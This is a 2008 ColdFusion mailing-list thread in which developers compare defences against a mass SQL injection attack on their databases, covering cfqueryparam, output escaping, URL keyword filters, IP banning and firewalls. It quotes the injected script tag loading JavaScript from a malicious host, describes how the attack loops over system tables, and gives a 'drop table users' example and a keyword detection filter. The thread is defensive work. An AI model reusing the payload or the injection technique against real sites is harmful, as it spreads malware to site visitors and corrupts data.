Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310413
Thanks, Andy and Ian --
I am going through this previous thread (I did get hit with this 2 or
3 weeks ago also) -- so, I am just wondering how I can get a
basic/minimal level of protection installed, maybe linked from application.cfm
I must have 100,000 pages I need to protect -- and my primary
database has something like 180 tables, some of which have more than
100 fields. So, I need something I can do quickly. And I got a lot
to learn about this.
So, just probing this one question -- what people are saying is -- it
comes through a URL -- and not a user forms-submission (or at least
that seems to be the case) ??
Here's a question:
If it is possible to do a basic general-purpose kind of input
filtering from application.cfm -- not as good as going through every
query, but something that can be done quickly -- would it be possible
to write a kind of generic protection script?
The specifics of this script would depend on the
variables/fieldnames/datatypes -- but if we had a general-purpose script,
1) stop attack type-A
2) stop attack type-B
3) stop attack type-C
programmer to fill in the blanks -- ie, itemize the field names and types....
Could that be done? If that were possible, that would be a great
help. Thanks for this good discussion.
- Bruce
----- Excess quoted text cut - see Original Post for more -----
At 09:25 AM 8/7/2008, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310410
> And yes, I'd like to see the URL "loop" script that was offered by Justin
Scott
I've had many requests for the SQL injection prevention script, so I'm
just going to post a URL directly to the code and release it into the
public domain for anyone interested:
http://www.gravityfree.com/_sqlprev.cfm.txt
-Justin Scott
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310409
> Can this be done through a URL?
Yes, easily.
----- Excess quoted text cut - see Original Post for more -----
Your database contains all its object names in metadata tables, which can be
queried directly.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310408
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
----- Excess quoted text cut - see Original Post for more -----
Author: Jacob
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310404
Any recommendations for web app firewall?
I have worked with Netscreen network firewall for years.
----- Excess quoted text cut - see Original Post for more -----
You'd need a web application firewall for this. Any ISAPI solution runs
in-process with the web server.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310393
Bruce Schuman wrote:
> How do they do this?
Yes it is done through the URL. This is well discussed here and in many
blogs. But the just gist is that the errant URL parameter is an ENTIRE
SQL function that well tell your database to scan every table looking at
every field, and if the field is a character field, to append the
payload to that field.
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310391
Bruce...
Without going into the whole thing, the script runs in your database and
selects against the systables and syscolumns tables. It then loops over
these and performs updates on existing records.
You really need to go back and read the entire thread from 3 weeks ago.
http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065
It has everything you'd need to know about what this attack does, how to
reverse the results, and lastly how to prevent it from happening again.
andy
> The attack appends JavaScript to character fields.
Hi. Just checking in here on SQL injection -- I am a self-taught
self-employed CF programmer, been doing this for quite a while, but there is
a ton I don't know. And I have been hit by this current wave of injection
So, my SQL Server 2005 database doesn't just get one record injected. It's
every record in a particular field, all containing (in this attack) this
code
script src="http://jjmaoduo.3322.org/csrss/w.js"
and a few more things in html I didn't include
What I have done to protect about 15 CF sites -- is simply require that
integer values be integers -- by cfincluding a list of params like this,
from application.cfm:
----- Excess quoted text cut - see Original Post for more -----
So, this text script has been injected into every record in about five
fields in my users table -- and also into a variety of other tables in the
same way: every record in that table, in some selected fields.
All these injected fields are text fields -- URLs, addresses,
Can this be done through a URL?
Does the list of fields that have been injected provide any clue about how
or where the injection attack occurred? How do these guys, or their
program, know my table names and my field names? I have some very obscure
field names, and they still get them injected - they are not guessing these
things, they know the name of the field.
If I wanted to duplicate what they did, I would write a loop that would go
through every record in the table, and CFUPDATE that particular record. In
fact, I wrote scripts like this to remove this junk, setting the record back
to what it was before the injection. How do they do this?
Anyway, got my hands full. Any thoughts on this would be great.
And yes, I'd like to see the URL "loop" script that was offered by Justin
Scott
----- Excess quoted text cut - see Original Post for more -----
Bruce Schuman
Santa Barbara CA
http://originresearch.com
Author: Matt Blatchley
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310390
We've got the same thing. Sonicwall checks everything coming in and out of
the network and checks for anything that matches a database of known
injection types. Helps a ton!
Matt
----- Excess quoted text cut - see Original Post for more -----
Author: Bruce Schuman
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310387
> The attack appends JavaScript to character fields.
Hi. Just checking in here on SQL injection -- I am a self-taught
self-employed CF programmer, been doing this for quite a while, but
there is a ton I don't know. And I have been hit by this current
wave of injection
So, my SQL Server 2005 database doesn't just get one record
injected. It's every record in a particular field, all containing
(in this attack) this code
script src="http://jjmaoduo.3322.org/csrss/w.js"
and a few more things in html I didn't include
What I have done to protect about 15 CF sites -- is simply require
that integer values be integers -- by cfincluding a list of params
like this, from application.cfm:
----- Excess quoted text cut - see Original Post for more -----
So, this text script has been injected into every record in about
five fields in my users table -- and also into a variety of other
tables in the same way: every record in that table, in some selected fields.
All these injected fields are text fields -- URLs, addresses,
Can this be done through a URL?
Does the list of fields that have been injected provide any clue
about how or where the injection attack occurred? How do these guys,
or their program, know my table names and my field names? I have
some very obscure field names, and they still get them injected -
they are not guessing these things, they know the name of the field.
If I wanted to duplicate what they did, I would write a loop that
would go through every record in the table, and CFUPDATE that
particular record. In fact, I wrote scripts like this to remove this
junk, setting the record back to what it was before the
injection. How do they do this?
Anyway, got my hands full. Any thoughts on this would be great.
And yes, I'd like to see the URL "loop" script that was offered by Justin Scott
----- Excess quoted text cut - see Original Post for more -----
Bruce Schuman
Santa Barbara CA
http://originresearch.com
Author: Mark Atkinson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310385
We drew a great deal of breathing room to implement the solutions
discussed here with our installation of Sonicwall firewall (about 600
bucks). Its intrusion prevention settings are highly configurable, both
globally and individually, and with an annual subscription of 200
dollars we get I believe daily upgrades to help configure against new
and known issues.
In our small shop its been worth every single penny.
HTH
Mark
Kris Jones wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310384
>>I'm a little bermused as to why you'd create such a response guys.
Just to make sure I give a chance to a legitimate user, in case my
robot detection was a bit too strong.
For instance, I also have a test based on the number of HTTP request per
second
in order to discriminate robots from human.
Sometimes, the limit is not easy to set precisely: there are fast
humans, and slow robots ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310383
Craig Dudley wrote:
> I suppose it would help **IF** a legitimate user came to your site at a
> later date from a banned IP, but that's all, or is that why you are doing
> it?
>
> Craig.
Exactly, if you are managing a popular enough site, it could happen. At
least once or twice in a blue moon.
I idea being that since the users may not be aware of their infection as
you mentioned, this just might be the way they find out.
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310380
Craig Dudley wrote:
> I suppose it would help **IF** a legitimate user came to your site at a
> later date from a banned IP, but that's all, or is that why you are doing
> it?
>
> Craig.
Exactly, if you are managing a popular enough site, it could happen. At
least once or twice in a blue moon.
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310378
----- Excess quoted text cut - see Original Post for more -----
You'd need a web application firewall for this. Any ISAPI solution runs
in-process with the web server.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Craig Dudley
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310377
I'm a little bermused as to why you'd create such a response guys.
A bot is attempting the injection attacks yes? It's not likely to be visible
to the host computer's owner as far as I can imagine.
I suppose it would help **IF** a legitimate user came to your site at a
later date from a banned IP, but that's all, or is that why you are doing
it?
Craig.
>>"Your system appears to be infect with a bot and it is
currently banned from access this site..."
The cherry on the sundae ;-)
In this page, I even have a form so the user can give his address and
claim his innocence ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310374
>>"Your system appears to be infect with a bot and it is
currently banned from access this site..."
The cherry on the sundae ;-)
In this page, I even have a form so the user can give his address and
claim his innocence ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310368
Claude Schneegans wrote:
> - In your application.cfm, simply check if cgi.REMOTE_ADDR is in the
> list of banned addresses
> and CFABORT if yes.
Just throwing a random thought that occurred to me when I read this.
If one cares to be a little nicer and proactive, maybe throw up a very
simple and basic, "Your system appears to be infect with a bot and it is
currently banned from access this site..." or something to that affect.
The idea being maybe some of the poor souls may learn something.
But only if one cares to do so.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310364
>>I was hoping to find an elegant solution that stored the Ips in the
application scope for the length of the session timeout and then gracefully
removed the banned Ips once the session timed out.
How about doing this:
- Create a server scope array or list (if you have several sites), or
just in the application scope.
- add to the array any banned IP,
- delete the first element in the array (the oldest), if its length is
over a certain maximum
based on the idea that
the bot is probably operating from an innocent infected PC and will
not be a threat for months, so it is not useful to memorize banned
addresses
for ever.
- the length of the array you will keep depends on the amount of attacks
you are receiving each day,
about 100 or so sounds reasonable.
- In your application.cfm, simply check if cgi.REMOTE_ADDR is in the
list of banned addresses
and CFABORT if yes.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310362
Thanks. I was hoping to find an elegant solution that stored the Ips in the
application scope for the length of the session timeout and then gracefully
removed the banned Ips once the session timed out. I have an idea on what to
do, but was looking for a little guidance as I am new to app.cfc and all of
its methods. Regards, CV.
>>Claude, could you possibly share your code that stores the bad IP
addresses for a period of time to prevent these useless http requests?
Thanks, CV.
Well, I'd be happy to, but it is a rather complete and complicated system.
It works for all sites/domains on the CF server, uses a database, and is
mainly oriented toward bad and unwanted bots elimination. The spam and SQL
injection detection is only a small part of it.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310361
>>I'd like to know how I can stop the requests from ever hitting the
web-server.
If you detect the attack at the first request, and block the IP, the bot
will
not even get the first page, will not see all links in it, and will not
search your entire server.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310360
>>Claude, could you possibly share your code that stores the bad IP
addresses
for a period of time to prevent these useless http requests? Thanks, CV.
Well, I'd be happy to, but it is a rather complete and complicated system.
It works for all sites/domains on the CF server, uses a database, and is
mainly
oriented toward bad and unwanted bots elimination. The spam and SQL
injection
detection is only a small part of it.
I can give you this part of code which detects illegal url parameters.
The idea is simply to
1. detect if an url parameter is invalid and,
2. if yes, check if there is anything evil in it.
In the first case, the request is simply ignored, in the second case,
the IP is banned.
This code will check if the parameter id is a numeric value:
<CFIF val(id) EQ 0
AND (id CONTAINS "http"
OR id CONTAINS "user"
OR id CONTAINS "declare"
OR id CONTAINS "exec")>
... ban this IP address
<CFABORT>
<CFELSE>
<CFSET id = val(id)>
</CFIF>
You may include this code in any page depending on some numeric parameter,
ot better: make it a custom tag or CFC.
For text parameters, like page names, etc. I simply use:
<CFIF pTexte CONTAINS "http"
OR pTexte CONTAINS "user"
OR pTexte CONTAINS "declare"
OR pTexte CONTAINS "exec">
For text fields in forms filled by users, a more precise analysis would
be needed, but
I have none of these on my sites. No one can enter anything if he is not
registered.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Randy Johnson - CFConcepts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310358
> No, that's exactly what he described. The attack appends JavaScript to
> character fields. And, unfortunately, blocking specific IP addresses won't
> get you very far here, because it's a random, automated attack run from
> compromised hosts in a botnet, I think.
>
>
Yea I think it is too. I started tracking ip's on a page that I saw
always showing up in FusionReactor. This morning I am up to 378
ipaddresses blocked within the last three days.
I started out by emailing myself the ip address thinking it would only
be a few ips. I cannot believe how bad the issue is...
-Randy
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310357
>>Tuesday night received about 20 thousands instances (not an
exaggeration). Slowing down now for us, but, heh, it's early.
This is were banning IPs at the first attempt will reduce this pollution.
If the attack is detected at the first attempt, and the address banned,
the statistics will show only one request per IP address.
Otherwise, you will allow the bot to open all your pages, archives, etc.
and your server may choke.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310356
I'd like to know how I can stop the requests from ever hitting the web-server.
Can anyone point me at a resource for a firewall solution? I've seen
some isapi filter solutions, but they all seem to just clean the
querystring and then forward the request on -- so it's still hitting
CF. I'd really like to stop it before we get to the web-server at all
(let alone the CF application server).
Cheers,
Kris
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310355
Claude, could you possibly share your code that stores the bad IP addresses
for a period of time to prevent these useless http requests? Thanks, CV.
>>blocking specific IP addresses won't
get you very far here, because it's a random.
blocking IP addresses won't prevent injection in your database if it is not
protected, but if an attack is detected the very first attempt, it will save
thousands of useless HTTP requests on your sites, because theses robots will
scan everything they find.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310354
>>blocking specific IP addresses won't
get you very far here, because it's a random.
blocking IP addresses won't prevent injection in your database if it is
not protected,
but if an attack is detected the very first attempt, it will save
thousands of useless HTTP
requests on your sites, because theses robots will scan everything they
find.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310353
We handled this attack last month (it never did get through), and
starting Tuesday night received about 20 thousands instances (not an
exaggeration). Slowing down now for us, but, heh, it's early.
Author: Les Mizzell
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310352
> We have CF5 and CFMX versions if anyone wants a copy.
I really see having several layers of protection to effectively stop
this sort fo thing. Something at the application level sounds like a
good first line of defense.
I'd be interested in seeing this.
Thanks
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310351
>>Various people have been warning in the last few weeks that this sort of
scatter gun approach that started with ASP-based sites is now migrating to
ColdFusion powered ones.
And it is growing up.
Yesterday, my bad bot closed the door to about 50 attacks, and this
morning I have 60 reported.
Usually I get around 5 only each night.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Justin D. Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310350
> Anyway, whatever solves the Michael's problem I feel sure
> is going to be a combination of things, not just the one.
Actually, with this particular SQL injection attack it's really easy to
stop. We created a SQL filter that is called from application.cfm. It
loops through the URL structure and checks to see if any URL variables
contain both a semi-colon and any SQL keyword. If a match is found, it just
cfaborts the request and sends us an e-mail with the details. We
periodically review those messages and have not found a single
false-positive yet after deployment to every site we manage. Granted, it
will not stop SQL injection through form posts, but I don't recall ever
seeing a SQL injection attack through a form post (yet). At the least it
can put an immediate stop to the current flood and give you time to
implement other protective measures such as cfqueryparam, etc. We have CF5
and CFMX versions if anyone wants a copy.
-Justin Scott
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310349
Michael,
I have about 5 posts on this issue:
http://www.coldfusionmuse.com
Starting with this one...
http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-A
SCII
There's no magic bullet. The basic procedure is going to be to implement a
blacklist function to prevent the attack (this is a "first level" defense to
give you some breathing room), restore your DB or fix it with one of the
several scripts running around, then go through your code and examine all
the queries and add cfqueryparam, then look at where you are handling form
inputs and validate what users have given you, then work on scrubbing
anything that is given by the user that is output to the page (to prevent
xss). Basically, other than the blacklist function (about which there are a
variety of opinions) all of these steps aught to be followed regularly as
your de facto coding standard.
-Mark
Well, as I said, the answer to this (as it is for a lot of things on the
web) is not one but a combination of tactics.
The ban ip thing might not be the bees knees for this but it sure
helps with the kind of thing i THOUGHT he was describing. I've been
able to almost eliminate spam entries from my gurestbook/contact us forms
(ok i havent almost eliminated , lets say dramatically reduced
then) across my sites. On one client's site for example, their
guestook was choking to death with thousands of entries all spam, and
now it's fewer than 5-6 spam entries a month. I have a database of
9600 or so ip addresses that i wont accept input from on any of my sites.
As time goes on it gets more and more effective.
Anyway, whatever solves the Michael's problem I feel sure is going to be a
combination of things, not just the one.
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer AFP Webworks
http://afpwebworks.com ColdFusion 8 Ent, PHP 4 and 5, ASP,
ASP.NET hosting
from AUD$15/month
On Thu, Aug 7, 2008 at 9:20 PM, Dave Watts <dwatts@figleaf.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310347
> The solution is to filter all input from users with something like
> cfqueryparam. The only reason to combine that with another solution is to
> filter data that made it in already... and like Tom said,
Ahh, no, not the only reason.
Support I enter JavaScript as my 'name' in a blog comment form. cfqp will let
that pass (it's text, in a text field, with a text cf_sql_type) but you still
want to htmlEditFormat() on output.
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: Bobby Hartsfield
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310344
If you have the option, that'd be much more efficient at the network level
than in the app and would filter the IPs for all apps at once. It might get
more 'effective' the larger it gets but it also gets less efficient.
The solution is to filter all input from users with something like
cfqueryparam. The only reason to combine that with another solution is to
filter data that made it in already... and like Tom said, simply formatting
the data with htmledit on display will render the script/html as useless
plain text.
Not to get on a rant either but... 5-6 successful spam submissions per month
is 5-6 too many in my opinion. There are too many simple solutions to 99.9%
of them. It used to be that 1 would send a developer on a frenzied mission
to stop it; now they are so abundant that people are becoming ok with 5 or 6
a month?
Come on... if you don't filter your user content, the terrorists win. ;-)
.:.:.:.:.:.:.:.:.:.:.
Bobby Hartsfield
http://acoderslife.com
http://cf4em.com
Well, as I said, the answer to this (as it is for a lot of things on
the web) is not one but a combination of tactics.
The ban ip thing might not be the bees knees for this but it sure
helps with the kind of thing i THOUGHT he was describing. I've been
able to almost eliminate spam entries from my gurestbook/contact us
forms (ok i havent almost eliminated , lets say dramatically reduced
then) across my sites. On one client's site for example, their
guestook was choking to death with thousands of entries all spam, and
now it's fewer than 5-6 spam entries a month. I have a database of
9600 or so ip addresses that i wont accept input from on any of my
sites. As time goes on it gets more and more effective.
Anyway, whatever solves the Michael's problem I feel sure is going to
be a combination of things, not just the one.
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion 8 Ent, PHP 4 and 5, ASP, ASP.NET hosting from AUD$15/month
On Thu, Aug 7, 2008 at 9:20 PM, Dave Watts <dwatts@figleaf.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310343
> Use CFQUERYPARAM around all user-submitted query values.
And htmlEditFormat() around places where database data is output to the end
user.
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310342
Well, as I said, the answer to this (as it is for a lot of things on
the web) is not one but a combination of tactics.
The ban ip thing might not be the bees knees for this but it sure
helps with the kind of thing i THOUGHT he was describing. I've been
able to almost eliminate spam entries from my gurestbook/contact us
forms (ok i havent almost eliminated , lets say dramatically reduced
then) across my sites. On one client's site for example, their
guestook was choking to death with thousands of entries all spam, and
now it's fewer than 5-6 spam entries a month. I have a database of
9600 or so ip addresses that i wont accept input from on any of my
sites. As time goes on it gets more and more effective.
Anyway, whatever solves the Michael's problem I feel sure is going to
be a combination of things, not just the one.
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion 8 Ent, PHP 4 and 5, ASP, ASP.NET hosting from AUD$15/month
On Thu, Aug 7, 2008 at 9:20 PM, Dave Watts <dwatts@figleaf.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310341
----- Excess quoted text cut - see Original Post for more -----
Use CFQUERYPARAM around all user-submitted query values.
http://www.adobe.com/devnet/coldfusion/articles/cfqueryparam.html
This specific issue came up on the list repeatedly over the last few weeks,
so you might want to check the list archives.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more
information!
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310340
> I konw you havent described a SQL injection ...
No, that's exactly what he described. The attack appends JavaScript to
character fields. And, unfortunately, blocking specific IP addresses won't
get you very far here, because it's a random, automated attack run from
compromised hosts in a botnet, I think.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310339
> Yes, I alerted my bosses to this at the time and unfortunately nothing
> was done - we were too pressed for time. We now have 4 people going
> through the site patching up all the vulnarable queries.
It's sad but true that security holes are never seen as important until it's
(almost) too late.
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: Dominic Watson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310337
Yes, I alerted my bosses to this at the time and unfortunately nothing
was done - we were too pressed for time. We now have 4 people going
through the site patching up all the vulnarable queries.
Dominic
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310336
> It appears we've been attacked by this last night / this morning too.
Various people have been warning in the last few weeks that this sort of
scatter gun approach that started with ASP-based sites is now migrating to
ColdFusion powered ones.
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: Dominic Watson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310332
It appears we've been attacked by this last night / this morning too.
Will update here with more info when we have it.
Dominic
----- Excess quoted text cut - see Original Post for more -----
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310331
There are a number of things you can do, and in fact i use all of these -
[A] Find out this person's ip address, and if the form is submitted
from that ip address, do nothing. Don't give them any kind of
feedback at all. That'll stop this current attack, but since these
idiots usually dart from one ip address to another, it's not enough to
fix the problem. Only stop today's . You can find out the ip address
by having you form submit #cgi.remote_addr# in a hidden field.
[B] pass the form's submitted contents through a regex to eliminate
any html. You can get all kinds of string manipulation scripts
through the library at cflib.org, including one to strip out any html
[C] use cfformprotect, which (amongst other things) compares the
submission in this form wiht a database of other form submissions from
other sites, and identifying which ones are spam and which arent.
When it tells you this is spam, you just throw it away. Dont tell
the spammer you're throwing it away, because that only helps them
refine their techniques. Those buggers are agile enough as it is
without us giving them a helping hand.
You can get cfformprotect form http://www.riaforge.org/ .
[D] while you're working in this area, you should make sure you're
using <cfqueryparam if you're processing the form into your database.
I konw you havent described a SQL injection, but it's not a million
miles away from what you do describe. There's ample documentation in
the ColdFusion docs about <cfqueryparam and there have been quite a
few blog articles about it lately. Google for cfqueryparam and
ColdFusion and you'll find them. Using <cfqueryparam on every (and i
do mean EVERY) parameter you insert into the database, on every insert
or update if there is likely to be any user input going in that SQL
statement. That ensures that you wont get anyone able to enter a
last name as 'Smith)';drop table users' or some such.
I started defending my sites from this kind of script when i had a
guestbook on a very low volume suddenly get 30,000 entries waiting for
editor approval, all with links to sites we might want to go and see,
just like yours has. Using the techniques i described reduced the
flow from thousands a day to a more likely 3-4 a week on this little
site.
Hope this helps.
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
On Thu, Aug 7, 2008 at 4:04 PM, Michael Suwanto
<michael.suwanto@724.com.au> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Michael Suwanto
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310330
Im a coldfusion noobs and my database just got injected with some script.
So for example one of the database field would appear something like so:
Gisella427.jpg"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><;!--
